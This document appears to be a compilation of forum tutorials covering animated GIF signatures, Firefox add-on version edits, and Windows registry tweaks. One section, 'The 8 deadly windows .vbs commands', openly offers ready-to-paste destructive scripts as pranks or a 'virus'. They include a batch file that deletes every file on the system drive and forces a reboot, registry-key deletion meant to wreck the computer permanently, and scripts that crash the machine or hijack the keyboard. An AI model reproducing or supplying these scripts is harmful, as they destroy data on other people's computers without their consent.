How To Create Animated Signature

In this tutorial i wud teach u how to make it

First of all look at this image carefully

Note the following points in this image

1: The signature consist of an animated object
2: Its moving ,yeah thats what it makes look like animated..
3: observe more carefully The signature consist of frames
4: after each frame the body moves
5:note the speed its uniform
6:frames are interlaced and transparent thats wt cause moments if its stuck the signature wont look nice

Softwares u need

Photoshop
Imageready

Steps
1: Open Photoshop and create a new image file measuring 100 by 100 pixels. Set the resolution to 72 pixels per inch and the mode to RGB color.

2:Choose Show Layers from the Window menu. This will bring up the Layers floating palette.

3: Select the pencil tool. Use it to draw a picture.

4: Click on the Layer palette’s submenu arrow and select Duplicate Layer.

5: Click on the eyeball icon to the left of the bottom layer on the Layer palette. Use the pencil tool to add to the image on the top layer. Select the erase tool to remove part of the image.

6: Under the file menu, select Jump to, and then Adobe ImageReady . Save when prompted.

now for image ready:

1:Choose Show Animation from the Window menu. This will bring up the Animation floating palette.

2:Click on the Animation palette’s submenu arrow and select Make Frames from Layers.

3: Use Save Optimized As to save the animation under a new name.

if u think that u are more advanced in doing all those
add special effects like
*shadow
*blur
*apply filters etc..
remember
each frame has its own importance

make sure the req time is constant

once a gif image is generated or created

upload it on orkut using feature “add photo”
from ur scrapbook

save the image location

Some Tips

imageready tips and warnings
# You can draw directly in ImageReady, which has nearly identical tools.

# Preview your animation by pressing play on the Animation palette.

# Add more unique frames for a richer animation
.
# Click on the time values at the bottom of each frame to adjust how long it will remain visible.

For orkut sigs make sure u keep the background as transparent

search gif images at

1:www.photobucket.com ,
2: www.imageshack.us ,
3: www.impimages.com,
4:www.google.com

search tips
type :

animated b fore ur req theme image
ex

animated beatbox

4 google

animated girl gifs
animated anime

_____________________________

CREDITS : GAURAV DHAWAN
_____________________________
PRS .

The 8 deadly windows .vbs commands

Note:- The Following tutorial is for educational purpose only. If you harm your or your friend’s computer using the following tutorial

I am going to provide some of my favorite .vbs codes, I use to play with in my childhood days. You can use these codes as a small term virus. Hence , you can also call this tutorial a virus creation tutorial.

To use the codes I am going to provide, all you need to do is to copy the codes,paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.
*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.

-The blue screen of Death [this might be dangerous]
Code:
CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer*

Code:
CODE
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10

-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*

Code:
CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE

-Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*
Code:
CODE
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

————————————————————————–
-Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*
Code:
CODE
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK**”
loop

————————————————————————–

-Endless Enter

*This constantly makes it so the enter button is being pressed continuesly*
Code:
CODE
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

—————————————————————————

-Endless Backspace

*This makes it so the backspace key is constantly being pressed*
Code:
CODE
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs**”
loop

—————————————————————————-
-Popping CD Drives

*This will make the CD drives constantly pop out*
Code:
CODE
Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

_________________________________

Regards ,

Prasad R.Suvarna

Make An Undeletable Folder

Steps To Make This File

1. Go to cmd.
2. Change to the directory that you want.
3. Assume i change to D:
4. So,in Command Prompt,type D: and [enter].
5. Type in this command “md \lpt1\\” without quotes and press enter.
6. The folder will now in your D:
7. Go and try and delete or rename it,you cannot do anything to it. There are still many names that you can use to name the folder: -lpt1 until lpt9 -CON -AUX


To delete it:

1. Go to Command Prompt again.
2. Navigate to the directory.
3. Type in rd \lpt1\\

REASON :-lpt1 is a reserved name in Win32 libraries so u cant delete it

CREDITS :-P rateek  Katyal

__________________________________

Regards,

Prasad

Make FireFox Addons Compatible

Search the addon you want on : https://addons.mozilla.org/firefox/
Pick the addon you want, for this tutorial I’ll use Add ‘N Edit Cookies.
You’ll notice if you’re using the newest version of FireFox that you aren’t able to install it.

-Step 2-


Start Internet Explorer or another browser. Go to the page of the addon and download it. You’ll notice the file is a .xpi file.

-Step 3-


Change the extension from .xpi to .zip , you’ll notice the file is now a archive.

-Step 4-

Open the archive with Winrar , Winzip or another program to view archives.
When you’re viewing the archive you’ll see serveral files the only 1 we need will be install.rdf. Extract install.rdf to your desktop or another place.

-Step 5-

Right mouse click on install.rdf and edit it. I’ll use Notepad


-Step 6-


Now hit CTRL+F (Search) and search for maxVersion. You’ll see that the maxversion = 3.0. Change the 0 to 5. Hit CTRL + S (Save).

-Step 7-


Now drag the file back to the archive and replace it with the old install.rdf .
Change the file extension back from .zip to .xpi .

-Step 8-

Start FireFox and drag the .xpi file the FireFox and you’ll see the addon install window. Install the addon and restart FireFox.

Congratz you’re done!

CREDITS : Zuaro

_______________________________

Regards,

Prasad R.Suvarna

Revealing the super hidden files

Microsoft has added many features to Windows XP to protect the critical files of the operating
system. The system file checker, for example, continually monitors the system files versions to
ensure that no application will replace your system files with a version that Windows XP was
not designed to work with. The new super hidden files feature allows Windows to protect itself
even further by hiding some of its most critical files from the user. If they can’t get to it, they
can’t hurt it, right?

Revealing the super hidden system files is not very difficult at all. You can uncheck the box
on the list on the View tab of Folder Options, but where is the fun in that? Use the Registry
Editor to turn this feature off:

1. Click the Start button and select Run.
2. Type regedit in the box and click OK to start up the Editor.
3. Once regedit appears, navigate through HKEY_CURRENT_USER\Software\
Microsoft\Windows\CurrentVersion\Explorer\Advanced.
4. Right-click ShowSuperHidden and select Modify.
5. Change the value to 1 and click OK to save your changes.
Now you will be able to see all of the files on your computer, including the super hidden system
files.

_____________________________

Regards ,

Prasad R.Suvarna [ ADMIN]

Renaming the Recycle Bin

The Recycle Bin is a great feature of Windows, but it is very difficult to customize the name.
Unlike other system icons on the desktop, you cannot just right-click it and select Rename.
The only way to rename the Recycle Bin is to hack the Registry. This is not as simple as the
method for the other icons, but you can easily get through it.To get started, let’s assume that
you want to rename the Recycle Bin as Trash Compactor:

1. Click the Start button and select Run.
2. Then type regedit in the box and click OK.
3. When the Registry Editor is started, you will want to expand the HKEY_CURRENT
_USER, Software, Microsoft,Windows, CurrentVersion, Explorer, CLSID, and
{645FF040-5081-101B-9F08-00AA002F954E} folders.

4. When you have expanded the last folder, you should see an entry called (Default) that
has no value. Right-click that entry and select Modify.

5. Next, just type Trash Compactor, or any other name, in the box and click OK. If
you want to hide the text under the Recycle Bin icon, you will still have to specify a
name. Instead of typing in a word, just click the spacebar once and then click OK.
You do not have to worry about entering in the ASCII code for a space when editing
the registry.

6. Close the Registry Editor and press F5 when viewing your desktop to see your changes.

If that does not work for your computer, then you will have to log out and log in to
activate the changes.
Now your Recycle Bin is no more. Hello Trash Compactor!

_______________________

Regards,

Prasad [ ADMIN]

Removing the clock from the taskbar

The clock can be very useful if you don’t have any other clocks in the same room as your computer.
Otherwise, it is just taking up space. After all, how many clocks do you really need? If
you want the maximum amount of space for your toolbars and open programs on the taskbar, I
suggest that you also remove the clock.

Removing the clock is extremely simple. Follow these quick instructions:

1. Right-click the system clock and select Properties.
2. Then, under the Notification Area on the Taskbar and Start Menu Properties window,
uncheck Show the Clock.
3. Click OK to save your changes and the clock will be gone.

—————-

Regards,
Prasad

Hiding programs from appearing in the Start panel

So you have a top-secret program that you do not want anyone else to know you have. Every
time you run a program on your computer,Windows XP keeps track of it and will place it on
your frequently run programs list as a convenience to you.

1. Click the Start Menu and select Run.Type in regedit and click OK to start up the
Registry Editor.

2. Next, expand the HKEY_CLASSES_ROOT folder.

3. Search through the list of folders until he finds the folder called Applications and
expand that as well.

4. Now he will see a list of every executable file for the programs installed on his computer.
To hide a program from the frequently run programs list, he will want to expand the
folder that is the executable for the program.To hide Solitaire, he will want to expand
the sol.exe folder.

CREDITS :- Steve Sinchak

__________________

Regards,
Prasad [ ADMIN]

Enable Num Lock to be turned on by default [ Windows XP]

If you have a password that has both numbers and letters and you frequently use the number
pad to enter in part of your password, this hack is for you. I cannot count the number of times
that I started to type in my password and then was faced with a logon error screen telling me
that my password was not correct. I would sit there staring at the screen for a second before I
realized that my Num Lock on my keyboard was not on.

This is a great hack for every desktop computer with a full-size keyboard with a separate number
pad.Turning on the Num Lock by default on a laptop may not be a very good idea, because
usually most laptops do not have a separate number pad. Enabling this feature on a laptop will
result in almost half of your keyboard to function as the number pad and you would just be
much better off using the numbers above the letters.

1. Start up Registry Editor by clicking the Start menu and selecting Run. Then type
regedit in the text box and click OK.

2. Once Registry Editor loads, navigate through HKEY_USERS, .DEFAULT, Control
Panel, and Keyboard.

3. Next, locate the InitialKeyboardIndicators entry, right-click it, and select Modify. You
can enter various codes into this property, but all of them except for the code for Num
Lock are pointless. For example, would you want your computer to start up caps-lock,
which is code 1? Of course not.To enable Num Lock, you will want to enter 2 into the
box.

4. Then click OK to save the changes, and that’s it!

If you are on a laptop and you attempted to enable Num Lock even though I told you not to
and need to fix your system, repeat the above directions but replace the value of
InitialKeyboardIndicators to 0 to disable the feature.

_________________________________________________
Regards ,
Prasad R Suvarna
[Admin]

Hiding a user from the Welcome screen [Win XP][TUT]

One of the unfortunate side effects of the Welcome screen is the listing of all of the user
accounts on the computer.What if there is an account that you do not want the whole world to
see? Using the same feature that Microsoft uses to hide system accounts from the Welcome
screen, you can hide user accounts as well.

Hiding user accounts can be done by a simple hack in the registry. Hidden away in the local
system settings is a list of accounts that Microsoft does not want to appear on the Welcome
screen.

To hide a user from the Welcome screen, all you have to do is create an entry on the list for the
user you want to hide. Follow these steps to find out how to add a user to the list:
1. Click the Start button and select Run, then type regedit in the box and click OK.
2. This will start up the system Registry Editor. You are going to want to expand the following
keys: HKEY_LOCAL_MACHINE, SOFTWARE, Microsoft,Windows NT,
CurrentVersion,Winlogon, SpecialAccounts, and UserList.

3. You should now see the list of the account names, and parts of account names, that the system
will look for and will hide.To add a name to the list, just right-click and select New
1 DWORD value, as shown in Figure 1-10. A DWORD is a specific data type of an entry
in the system registry. In short, the DWORD data type allows an integer value to be stored.
4. When the new key is created, enter in the name of the user’s account as the name of the
key. Once you have done this, you can close regedit.
After log off and back on or reboot, the user will not be displayed on the Welcome screen.
If you ever want to log into the account that you hid from the Welcome screen, just press
CtrlAltDelete on your keyboard once, twice, and you will be able to type in the name of
the user under which you want to log in. This way, you can hide an account from your family or
friends but can still log into it.
If you ever change your mind and want the account to be displayed on the Welcome screen
again, just delete the entry that you made in the list in the System Registry and everything will
be back the way it was.